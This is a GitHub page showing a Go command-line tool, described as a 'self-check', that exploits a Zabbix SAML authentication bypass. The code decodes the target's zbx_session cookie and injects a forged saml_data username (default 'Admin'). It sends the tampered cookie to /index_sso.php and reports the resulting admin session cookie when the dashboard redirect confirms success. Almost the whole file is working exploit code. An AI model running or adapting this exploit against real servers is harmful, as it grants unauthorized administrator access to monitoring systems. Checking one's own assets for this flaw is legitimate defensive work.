-
Notifications
You must be signed in to change notification settings - Fork 42
/
main.go
124 lines (117 loc) · 2.67 KB
/
main.go
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59
60
61
62
63
64
65
66
67
68
69
70
71
72
73
74
75
76
77
78
79
80
81
82
83
84
85
86
87
88
89
90
91
92
93
94
95
96
97
98
99
100
101
102
103
104
105
106
107
108
109
110
111
112
113
114
115
116
117
118
119
120
121
122
123
124
package main
import (
"bytes"
"context"
"encoding/base64"
"encoding/json"
"github.com/kataras/golog"
"github.com/urfave/cli/v2"
"github.com/xiecat/xhttp"
"net/http"
"net/url"
"os"
)
func main() {
app := &cli.App{
Name: "zabbix saml bypass self-check tool",
Usage: "developed by jweny(https://github.com/jweny)",
Commands: []*cli.Command{
{
Name: "check",
Aliases: []string{"c"},
Usage: "check multi assets",
Flags: []cli.Flag{
&cli.StringFlag{
Name: "target",
Aliases: []string{"t"},
Usage: "target for check",
Required: true,
},
&cli.StringFlag{
Name: "username",
Aliases: []string{"u"},
Usage: "default username",
Required: true,
},
},
Action: func(c *cli.Context) error {
target := c.String("target")
req, err := http.NewRequest("GET", target, nil)
if err != nil {
return err
}
defaultUsername := c.String("username")
if defaultUsername == "" {
defaultUsername = "Admin"
}
if result, cookie := exp(req, defaultUsername); result {
golog.Infof("vul exist! target: %s, cookie: %s", target, cookie)
}
return nil
},
},
},
}
err := app.Run(os.Args)
if err != nil {
golog.Fatal(err)
}
}
func exp(req *http.Request, defaultName string) (bool, string) {
c, err := xhttp.NewDefaultClient(nil)
if err != nil {
return false, ""
}
xReq := &xhttp.Request{RawRequest: req}
ctx := context.Background()
resp, err := c.Do(ctx, xReq)
if err != nil {
return false, ""
}
if !bytes.Contains(resp.Body, []byte("SAML")) {
return false, ""
}
mayVul := false
var cookie *http.Cookie
for _, c := range resp.RawResponse.Cookies() {
if c.Name == "zbx_session" {
mayVul = true
cookie = c
break
}
}
if !mayVul {
return false, ""
}
zabbixSession, err := url.PathUnescape(cookie.Value)
if err != nil {
return false, ""
}
zabbixSessionBytes, err := base64.StdEncoding.DecodeString(zabbixSession)
if err != nil {
return false, ""
}
sign := make(map[string]interface{})
err = json.Unmarshal(zabbixSessionBytes, &sign)
if err != nil {
return false, ""
}
sign["saml_data"] = map[string]string{
"username_attribute": defaultName,
}
signBytes, err := json.Marshal(sign)
if err != nil {
return false, ""
}
cookie.Value = url.PathEscape(base64.StdEncoding.EncodeToString(signBytes))
xReq.RawRequest.AddCookie(cookie)
xReq.RawRequest.URL.Path = "/index_sso.php"
resp, err = c.Do(ctx, xReq)
if err != nil {
return false, ""
}
if resp.GetStatus() == 302 && resp.GetHeaders().Get("Location") == "zabbix.php?action=dashboard.view" {
return true, cookie.Raw
}
return false, ""
}